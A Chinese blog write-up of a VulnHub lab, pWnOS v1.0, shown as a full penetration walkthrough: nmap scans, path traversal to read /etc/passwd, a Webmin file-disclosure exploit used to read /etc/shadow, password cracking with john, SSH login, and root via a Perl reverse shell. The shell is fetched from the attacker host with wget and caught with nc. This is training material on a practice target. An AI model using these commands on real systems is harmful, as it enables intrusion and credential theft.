实战pWnOS_v1.0靶机渗透提权思路整理

最新推荐文章于 2024-06-02 15:58:33 发布
最新推荐文章于 2024-06-02 15:58:33 发布
阅读量271 收藏 1
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39641273/article/details/131004535
版权

靶场下载地址

https://www.vulnhub.com/entry/pwnos-10,33/

靶场信息介绍

如果VMware询问您是否在第一次启动时复制或移动了此虚拟机,请单击已移动!否则,网络设置可能会被打乱。
虚拟机当前设置为使用桥接网络,但您可能希望将其更改为NAT或仅主机...具体取决于您的首选项

一、信息收集

目标主机发现。扫描本地网络c端,查看有无新增主机。

nmap -sn 192.168.10.0/24

以10000的速度对目标主机进行第二次详细扫描

nmap --min-rate 10000 -p- 192.168.10.29

此时发现目标主机开放了22,80,139,139,445,10000端口。我们把信息记录下来。

接下来我们用tcp协议的方式对目标主机开放的端口进行详细扫描。

nmap -sT -sC -sV -O -p22,80,139,445,10000 192.168.10.29

我们将得到的信息记录下来,一遍需要的时候反复查看,确认攻击思路.

接下来我们使用udp的方式对目标主机进行扫描

nmap -sU 192.168.10.29

我们这时候还是把信息记录下来,为后续的思路反复观看。

使用脚本扫描对已发现的端口进行漏洞探测

nmap -sT -sC -sV -O -p22,80,139,445,10000 192.168.10.29

思路总结:这时候发现存在漏洞,优先比较dos在渗透攻击中动静比较大比较暴力一般优先级往后,ssh协议暴力破解没啥技术含量,如果是强口令破解起来浪费时间基本上攻击顺序也是排后。这时候还发现存在webmin的文件泄漏,也算一个可利用的漏洞。我们先把扫到的信息记录起来,方便后续思路的整理。

知识点
#-sT 以tcp的方式进行扫描,不安全,慢
#-sC 使用脚本进行扫描,耗时长
#-sV 对端口上的服务程序版本进行扫描
#-O 对目标上的os操作系统版本进行扫描
#-sU UDP扫描,慢,可得到有价值的服务器程序
#--script=vuln 用脚本扫描出一些可执行的存在漏洞

二、web渗透

首先我们打开他的web页面,可以发现80端口和10000端口是可以打开的,80端口是一个普通的静态页面,而10000端口则是这个网站的管理员后台,

查看网站源码

 

从信息收集环节我们得知了此台主机的操作系统内核为liunx2.6.22,我们可以尝试对网站进行文件包含测试

 我们在url处输入‘,发现出发报错信息

 

根据报错我们得知网站可能存在漏洞,我们在connect=参数的后面接上liunx的目录

../../../etc/passwd

此时我们已经获得了目标主机/etc/passwd的内容,我们对主机里的用户进行分析拆解

curl 'http://192.168.10.29/index1.php?help=true&connect=../../../etc/passwd'

三、漏洞利用 

我们通过信息收集和web的渗透已经得知存在webmin的文件泄漏漏洞,还暴露出了该主机的用户。借来下来我们将利用webmin 漏洞进行攻击

通过searchsploit查找攻击渗透模块

searchsploit webmin

选择下载Arbitrary File Disclosure  | multiple/remote/2017.pl任意文件泄漏攻击模块

searchsploit -m 2017.pl

 使用任意文件泄漏攻击模块攻击目标主机/etc/shadow文件,使其信息泄漏

perl 2017.pl 192.168.10.29 10000 /etc/shadow 0


*知识点
/etc/passwd是存放用户信息的文件
/etc/shadow存放的则是用户的密码

此时我们已经获得了各用户的密码。

四、密码破解

我们将需要登陆的用户密码另存为文件passwd

使用字典对获得的加密数据进行暴力破解获取用户的密码

john passwd --wordlist=/usr/share/wordlists/rockyou.txt

获得密码,这时候可以通过ssh协议进行登陆 

ssh -oHostKeyAlgorithms=ssh-rsa,ssh-dss vmware@192.168.10.29

 成功进入目标主机!(此处应有背景音乐) 

五、提权

我们通过webmin文件泄漏得到shadow文件内容,shadow文件权限较高,我们可以推倒得出是存在提权漏洞的,此时我们需要构造一个反弹的shell进行提权

构造反弹shell

cp /usr/share/webshells/perl/perl-reverse-shell.pl  shell.cgi

 修改配置参数

架设php服务 

php -S 0:80

操纵vmware用户获取反弹shell并执行反弹shell

wget http://192.168.10.33/shell.cgi

给权限 

chmod 777 shell.cgi

 kali攻击机监听1234端口

 sudo nc  -lvnp 1234

 通过perl执行反弹shell

perl 2017.pl 192.168.10.29 10000 /home/vmware/shell.cgi 0

查看监听端口1234得到回传 

 输入whoami查看权限

 已得到管理员权限,ip地址也是靶机攻击地址

成功提权

贺越洋
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
Vulnhub靶机系列:pWnOS: 1.0
汗的博客
03-29 2476
https://www.hackingarticles.in/hack-the-pwnos-1-0-boot-to-root/ 文章目录靶机地址利用知识信息收集Getshell提权 靶机地址 https://www.vulnhub.com/entry/pwnos-10,33/ tip:如果Vmware在首次引导时询问您是复制还是移动了该虚拟机,请单击MOVED!否则,网络设置可能会混乱。 利用知识...
crasher.tar(DC3靶机所需提权exp-2)
02-20
DC3靶机所需提权exp
exploit.tar(DC3靶机所需提权exp-1)
02-20
39772.zip
MyOA.rar_easy _myoa_myoa靶机_oa_ssh mysql 框架
09-24
一个OA项目,框架SSH 数据库是;mysql 前端是easy UI
PWNOSv2.0:Desarrollo del CTF PWNOSv2.0
03-06
PWNOSv2.0 Desarrollo del CTF PWNOSv2.0 下载: : 1.配置。 IP地址为10.10.10.100的虚拟虚拟环境配置。 视在实体之间的差异而进行的配置。 2.埃斯卡诺-德波多斯 root@kali:~/PWNOS# nmap -n -P0 -p- -sC -sV -O -T5 -oA full 10.10.10.100 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-04 21:36 EST Nmap scan report for 10.10.10.100 Host is up (0.00033s
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
PWNOS: 1.0 解法一
Mysmycbx的博客
03-14 402
PWNOS1.0 解法一
pWnOS v1.0靶机渗透测试流程 儿童版
RemedyVI的博客
07-14 213
通过漏洞扫描发现10000端口存在任意文件读取漏洞,读取/etc/passwd和/etc/shadow获取可登录的用户密码,然后暴力破解得到vmware的密码h4ckm3,登录SSH后,再次利用该漏洞获取反弹shell成功提权
PWNOS: 1.0 解法二
Mysmycbx的博客
03-15 291
etc/passwd里有四个用户,因为用户管理该靶机时,肯定用ssh和密码登录,也许不用ssh,如果用了就是一条新的路径。
红队打靶:pWnOS1.0打靶思路详解之ssh私钥破解+shellshock漏洞提权
Bossfrank的博客
07-01 1118
本文详述了vulnhub靶机pWnOS1.0的详细打靶的第二种方法。打靶过程涉及到关于webmin任意文件泄露、ssh私钥碰撞、shellshock漏洞提权等。自己动手才发现问题很多,这个靶机的知识点还是很丰富。
靶机精讲之pwnOS1.0解法二
m0_63285023的博客
04-16 340
语句:env x='(){ :;看shellsock是否存在(版本小于4.3可能存在漏洞)要用私钥的库碰撞进行链接(伪随机生成库)prng。失败(根据报错原因查找问题所在,一定要看英文)由于up没有找到所以跟随脚步,搜索其他用户。复制一段公钥放到/rsa/2048。没有找到,反而没有目录情况找到了。私钥没有扩展名的(公钥去掉扩展名)可以利用版本漏洞(内核漏洞)退出初始shell,重新登录。利用OpenSSL,下载。
记录一次pWnOS1.0打靶(vulnhub) webmin漏洞利用
chencyyan的博客
01-14 1012
萌新第一次写blog,各位大佬别喷。有错误和补充的地方希望各位大佬各位师傅指出​本博客内容借鉴Bossfrank和红队笔记大佬「红队笔记」靶机精讲:pWnOS1.0 - 在Perl CGI架构下构造反弹shell,你可以吗?红队打靶:pWnOS1.0打靶思路详解之webmin漏洞利用​[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传](https://img-home.csdnimg.cn/images/20230724024159.png?
红队打靶:pWnOS1.0打靶思路详解之webmin漏洞利用(vulnhub)
Bossfrank的博客
06-30 786
本文详述了vulhub靶机pWnOS1.0的打靶过程。涉及到知识点包括文件包含漏洞、webmin任意文件泄露、john密码破解、perl反弹shell等。靶机难度不高,但很精良,渗透过程环环相扣,每一步都逻辑清晰。
Docker 安全及日志管理
最新发布
2301_77081516的博客
06-02 281
虚拟机通过添加 Hypervisor 层,虚拟出网卡、内存、CPU 等虚拟硬件,再在其上建立虚拟机,每个虚拟机都有自己的系统内核。而 Docker 容器则是通过隔离的方式,将文件系统、 进程、设备、网络等资源进行隔离,再对权限、CPU 资源等进行控制,最终让容器之间互不影响,容器无法影响宿主机。容器与宿主机共享内核、文件系统、硬件等资源。
掌控安全CTF-2024年5月擂台赛-WP(部分)
ASD830的博客
05-27 1126
如果实在没看到的话(或者扫不出来),可以放stegsolve里面看看,red plane 3,够清晰了吧哈哈哈。
企业如何安全的使用U盘
feng_321_的博客
05-29 587
U盘的随意使用可能导致未经授权的人员随意插拔U盘,增加了信息泄露的风险。对于已经确定的内部使用的U盘,可以对U盘进行加密,拷贝到U 盘里面的文件,然后他如果说把U盘拿出去用是需要先格式化的格式化完之后,才可以用。如果员工使用的U盘感染了病毒,那么病毒可能会通过U盘传播到企业的计算机系统中,导致系统瘫痪、数据损坏甚至丢失。:使用专门的设备控制软件,如安秉网盾终端管理系统,可以灵活地管理和控制USB设备的使用权限,指定哪些U盘可以使用,哪些不能使用。员工随意使用U盘可能会导致工作流程混乱,影响工作效率。
助力矿山智能化建设,中海达推出全新安全管控方案
Hi_Target的博客
05-30 712
针对露天矿边坡、尾矿库、采空区地表沉降等问题,采用北斗高精度定位、地基InSAR、激光雷达等技术,实现大范围全覆盖、多源数据融合、自动化监测、实时预警。采用北斗、UWB/蓝牙、音视频、5G等技术,实现露天矿人员、车辆的全方位实时监控、电子围栏告警、指挥调度,提升矿山安全生产管理水平。2008年进入矿山安全监测领域,至今已有十六年的研发、交付和运维经验,实施案例遍布内蒙古、新疆、西藏、云南、广东、福建等多个省市自治区。涉及井上井下,道路分布复杂、人员车辆密集、车辆载重大,易发生地质灾害和人员安全事故。
Linux防火墙(以iptables为例)
Tassel_YUE的博客
05-28 1061
防火墙是一种网络安全设备,用于监视和控制网络数据流量。其主要功能是在不同网络之间建立一条阻隔,对进出的数据流量进行过滤和筛选,从而保护内部网络免受未经授权的访问和恶意攻击。防火墙通过规则集合控制网络流量的通过与阻止,这些规则可以根据网络策略和需求进行配置。不正确的配置可能导致无法访问特定服务或应用程序。
windows提权靶机
09-12
Windows提权靶机是用于学习和实践Windows系统提权技术的虚拟机或实体机。它模拟了一个具有已知漏洞或弱点的Windows系统,让安全研究人员、渗透测试人员或学习者能够探索和实践提权攻击技术。 有一些常见的Windows提...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

贺越洋

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值